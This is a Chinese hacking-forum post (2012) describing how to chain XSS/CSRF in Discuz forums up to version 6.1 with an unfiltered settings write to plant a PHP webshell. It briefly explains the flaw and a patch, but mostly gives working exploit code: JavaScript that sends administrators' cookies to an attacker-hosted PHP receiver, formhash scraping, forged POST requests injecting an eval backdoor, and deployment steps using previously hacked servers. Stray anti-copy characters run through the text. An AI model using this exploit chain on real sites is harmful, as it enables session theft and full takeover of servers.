中国网络渗透测试联盟

标题: Discuz XSS得webshell [打印本页]

作者: admin    时间: 2012-9-13 17:11
标题: Discuz XSS得webshell
Discuz XSS得webshell
3 G! n' B  A2 ^By racle @tian6.com# p: @1 K* e* q8 s6 q0 U9 _
欢迎转帖.但请保留版权信息.. L# A5 \* _; I. Z" U, Y
受影响版本iscuz<=6.1.0,gbk+utf+big54 ~* g3 f4 e$ h% b

7 M; [1 Z) a$ l新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
$ _0 [: x3 t$ w  R7 P$ \: p/ o/ e7 ]
$ k0 O, G. c1 S) {0 b9 W2 P
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
# [; K- N8 y4 K7 f! I+ \当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.8 J4 t- ?( e% ]. K& T3 V0 d

+ I0 ~( [" r( P# n分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
$ T. [* _: C2 ?: B% n- g本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
$ }. F: t; A% J4 ~6 Z  N& R) u& O; S% I$ H9 `0 _
! O$ b( q1 k( }" I8 P3 L# U
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------, y+ K) F0 ~( _! J: w

2 l5 y+ ]$ Y- T: E( ^" L! }( w" v. t/ M# S9 u
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.8 @4 G* W5 }) \* [! Y5 |
% z  H/ t) M% v. f
problem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
: s9 q) ^4 a- V2 E# J% X8 C, I( G0 p9 t! K$ N/ I" S
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
; d0 {: \4 R4 P. z' \0 Q# y; o- O; i% d) \, s

& q+ H0 @5 c4 x. _7 X下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {8 M$ C% [% b3 C' x& B

# P+ K2 {0 n1 V4 x+ P  c& S        global $runwizardfile, $runwizardhistory;
0 B5 m8 l+ r" p5 k1 m, X4 S; a/ ?$ |/ h3 v: J7 G! ^( Y3 O
        $fp = fopen($runwizardfile, 'w');" e! o; B" A; i. G5 W' G0 L

( Y: W( g2 d9 Q        fwrite($fp, serialize($runwizardhistory));. \8 B3 c- ], B* p9 S

; G& o- |# H, x/ y& i1 n        fclose($fp);8 T# k$ w1 B0 E

- h' F- s0 Y" i/ p1 h+ t, Q}
2 o( r+ b4 J0 X复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.  {: `, _4 L; j; j, q
以下是修补的办法:function saverunwizardhistory() {
- K8 ^% l4 J4 L* ]. q/ t9 K: p( ^( |& w8 j- ?' e: L' y
        global $runwizardfile, $runwizardhistory;) }$ [9 u1 {" `7 V% C: E9 {
" p7 W) a* T" t
        $fp = fopen($runwizardfile, 'w');
: |' z4 y& p8 b' w- f% X3 w% m1 Y& H4 f3 h5 c
        $s = '<?php exit;?>';3 h, [3 O" u8 w6 B" T7 J3 p, o' V- w
- {* x" p: I- |# ^- O6 Z# _
        $s .= serialize($runwizardhistory);
9 |3 Q0 P. q5 N( ~1 O. A9 j/ e$ L  K; F, K) W
        fwrite($fp, $s);
3 q3 R7 y2 ~9 ]* ?4 Q: n+ c- C9 N5 A& G. i; b
        fclose($fp);
, |. K+ l6 F+ V2 l  v! F% }, u" v( r# ~: r0 z
}; W5 S: A4 A# V
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.4 D: E6 r, }; c- M  D+ y, x
) h" I% L- O% P
0 g( W% o$ L) _) E
9 }8 `% {3 y" h7 r4 ^2 N& f1 H
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------, p# G3 O/ \8 K4 e/ d3 w& G

9 ?( h9 y3 w5 c4 o7 u
& {% U0 Z" ^" u% m$ F% t  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了./ P5 b1 L1 [+ B/ n2 l8 z
3 e( y% }6 [$ P$ l; J, {
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
* ~+ v* d! g, ]) R1 S
, ]- l+ d$ Z" a这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
) o8 g! f% q& P( G6 W' T/ Y: U/ {' U. g7 i2 d9 N
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:8 _" h. J/ O4 Z6 P; ~' Y2 A
, h/ `3 a  _- L! M& ]( F
var url="http://目标网站/admincp.php";      " Q+ T. ^. V/ b2 r3 `# d
0 A0 x6 T9 F0 s* R
/*获得cookies*/
3 H# q. g8 M- |4 i" V( K; A5 X
7 k2 E( d( ?; rfunction getURL(s) {1 E" L/ n# B) P& t
/ R% _1 P: M6 _( C7 F$ L
var image = new Image();+ t* y# r* K, ~8 M6 g% x

) a; w+ e; G: P* V* iimage.style.width = 0;
7 E  E. V1 s1 b$ b( K3 M7 a' [1 S6 H& L
image.style.height = 0;3 [# k; g+ y5 ?( o: @8 Y8 a, m) m/ W4 \
9 X! W* z/ c8 j5 \0 b
image.src = s;6 p5 ]/ v+ e& |

* V: r2 ~1 c+ U" H# K7 F: e: K}2 {- y4 x  D8 R
) S* r8 r/ p3 i1 P% M
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
7 J0 y4 k9 B; y9 }复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
$ T+ s6 T# z- m/ e复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 1 \: d  N- X- m) ~# z- j
! _- C: A+ ~2 R1 l

3 B2 ?+ L# o& z% n1 i获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";' ]! `4 H7 C+ X2 T& O; g
, d. `$ G8 r$ `7 z9 n: A

1 t3 Y$ c4 @8 h1 Z  w
1 T3 Q* @" a0 }$ f! l6 L/*hash*/
! l: R& |( `- s. w( G4 I2 r( ~. C3 B& [4 B  {9 r
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");) e4 k, [5 I$ j

  ~( \- y1 a5 `- @0 I4 R' _xmlHttpReq.open("GET", url+"admincp.php?action=home", false);8 x7 U1 P0 K* F, R- B0 g4 t+ d
: i* b- n. F: o0 A
xmlHttpReq.send();8 f7 j; i% k! @7 }) }5 }

  Z( G0 b  l7 F- I0 m: ], Avar resource = xmlHttpReq.responseText;; q' Z" j, Y5 K8 _! |: N: d
1 |0 @* T7 a. j8 r' k% v3 J. u
var numero = resource.search(/formhash/);' z  s2 d7 U1 s' \
3 M  c' X2 U, _1 l7 l  M
var formhash=encodeURIComponent(resource.substr(numero+17,8));5 V! R7 r8 Q5 R. V& y

) S7 G/ q$ O" k* B% }: d$ F( P! T
4 f* f4 M# T2 V/ S% p% W2 ?: }
% o1 }" A) {$ U1 _" T: Qvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 - t) X4 d! V: l  |, P4 C* [/ G

- c& d: X; s4 e; l' uxmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 : T* F0 ~0 ?: {2 x# _
) I# [3 O0 O+ @* O8 }
xmlHttpReq.setRequestHeader("Referer", url);
" m1 q% L! M& C/ p. O
; p  {# R' k$ zxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");6 S& S9 C: A+ o
% F" b* J' B  m, h
xmlHttpReq.setrequestheader("content-length",post.length);
3 y- B) T6 o# [6 D
, p' c) ]6 o0 C- {xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); : A" c8 n7 e$ S8 \
: N5 @2 ]  D1 r
xmlHttpReq.send(post);//发送数据( b, O. V* d8 ?' y8 D  P" `
复制代码这里HASH我假设正确,这样提交,也无须cookies  L8 `  D+ ?4 @# o
! W6 g% d5 _1 C' G% K
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
  _" D) `0 b# R% P# }' E% t( n& h1 r9 q/ \4 Y: V# p
if (!$sock) die("$errstr ($errno)\n");+ V4 ~. w+ w! v  t
9 t% G& ]# ~5 @5 r0 j
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
2 d+ c! v; M% E# G; H
, O; X( _/ G. B) V
# |- I& l- i# @* F$ r; a2 L* m2 i2 H
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");8 J) Q! F% `' A: K/ l# A

4 e3 S& `1 {$ I0 j  H" jfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
4 j2 e6 Q9 {+ u: V! k$ H# x* b: E4 v
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
! G. S8 h' D& Y$ S( K8 Y( H2 [- Z2 L
fwrite($sock, "Accept-Language: zh-cn\r\n");0 C8 K/ k/ [5 a1 s* }$ y1 _
% z) {( W- p9 `; q& n! m
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
1 X+ v* G: E3 `7 |: r/ V! |' H( W* p' ^: N. n% g( {$ g
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
. a0 I! _6 s/ b4 P
: V+ J8 i  h( Z4 ]% I) u: yfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");9 J0 I9 d; I4 O5 }  p' ?
# V4 i/ s5 M3 E; H- s3 w
fwrite($sock, "Host: $url\r\n");
8 I) }& R) N  y& N8 Y" O; Z
3 v! H8 ^* `; w/ ]# }: Hfwrite($sock, "Content-Length: ".strlen($data)."\r\n");" r" l. \  y+ F* W% S8 w. j

& q2 W; {4 j6 X) ifwrite($sock, "Connection: Keep-Alive\r\n");, d/ v. a; G* u% y8 N
! X. N* D7 {8 Z& q" @( ?
fwrite($sock, "Cache-Control: no-cache\r\n");
; v( j6 j8 F( [. n/ U
7 r& l6 C) I- L* sfwrite($sock, "Cookie:".$cookies."\r\n\r\n");/ Y' X0 d  Z1 b7 h1 \# B9 P6 w# j" e( h

+ _& m! Q. m& e, Zfwrite($sock, $data);2 P" b, t9 g8 r" d# f; B+ ?
) J, w' K$ ^( b( {' w7 q
" y1 ?8 u4 m) d0 J8 a

9 d* [) K3 }+ P8 k3 r9 j- |$headers = "";- [  B" }( P. p- G# Z
) o8 Z7 }% K( Z) V  k( p( P
while ($str = trim(fgets($sock, 4096)))* U( B; x* B' W( A1 A, b/ X9 L. f
3 u; h- |$ }, m, X! }( d; K
     $headers .= "$str\n";
5 z4 F5 h2 N8 g( t/ n5 z6 s% ^3 |! o5 ^/ h
echo "\n";. k* ^5 ^/ z3 e1 u: f! _) g/ M9 Y
3 T& [# ?1 W6 K' F4 Z: I% [0 Y1 s; o
$body = "";
/ V7 g, X) L9 X3 Q# {
1 U5 @: d/ M- s7 W: S7 f! _/ }while (!feof($sock))
. C0 P8 A  M3 N% z9 e, _* }8 b6 B) _
     $body .= fgets($sock, 4096);
. V9 @1 s8 ~. ?$ Y* \+ w4 T8 w: T+ O1 Y& ^: D5 h- H
fclose($sock);) i1 D3 v& B, J0 s& Y

: }& w  S! d1 B+ fecho $body;
( ]' m  J3 p  n. v( A6 P复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
' i# q) \& l, L8 |) m
% Y  C( }9 @  l
8 z8 e" ^( T2 A4 y0 }3 Q3 x-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
4 b! o' T, Z0 o2 X6 q3 q/ g5 t. j4 }$ z2 K2 Q1 T
6 x$ E5 l- b3 j9 V; y7 l4 G
1HP SOCKET利用方法首先打开racle.js  g, G5 f5 J1 U( h4 s$ [

' C2 C( S4 H6 `) c6 V2 vvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home* P9 n: B8 w, u( {. n! H
4 t: \4 X7 t: W. E! K" w) G" p( R$ X% K

- Q/ l1 h& L* F- ~0 J. g. |6 t& U% q1 d& Y$ v; M
然后打开racle@tian6.php
, {; `  `0 U# O' T4 t  v+ f5 P9 \  d, y% ]9 r; g" I
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
3 p; G4 ]9 V4 ]' p( e) R
8 E$ G8 t  X! K* f8 z! n6 _+ W0 K+ E& j! p1 l) ^' u9 ^0 \

8 A% l8 |8 J' z0 q, X" a如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
2 V* K* a5 s$ k: ?% F# t2 \  p( e" p* V8 v. {
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
& Z3 q5 l. I' k
" U* ^7 S6 Z1 L8 u" g5 V9 V; f/ b9 m" }2 n) ?* O+ i
, g! }, k0 _% ^
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
" u0 g, \3 C0 R$ I# d复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.6 V( R* ?* ^* S& b9 Z; C  D
& o4 N1 J$ \' W# g

& h/ Q. b$ c1 w) o+ [4 W) [1 k; P- k# F, @
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
1 Y7 S0 J5 ]2 n
8 b+ P1 k- h% yvar formhash=encodeURIComponent(resource.substr(numero+17,8));
  d2 r& h7 p. [% h5 [0 b' W5 C. P4 d7 }4 ?
% J/ \* n. U$ ^  U' g
, H, v# g0 w) m; ~; E% F3 v
var formhash=encodeURIComponent(resource.substr(numero+9,8));6 [* I# r1 {5 f* [3 Z
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.; @: ?6 `! y) M2 J6 e% d
! N3 ?6 U% W5 u, B
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.. C3 t  V9 H! R5 l1 d( C
- v  f, m; I; m: N
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
- L; H' o: n7 s5 ?& @. E& Q+ K( o, ^5 r' ?- e
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
' ~. s' c5 J4 }1 i/ H 8 _8 {+ O4 V" ]* ~2 q





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2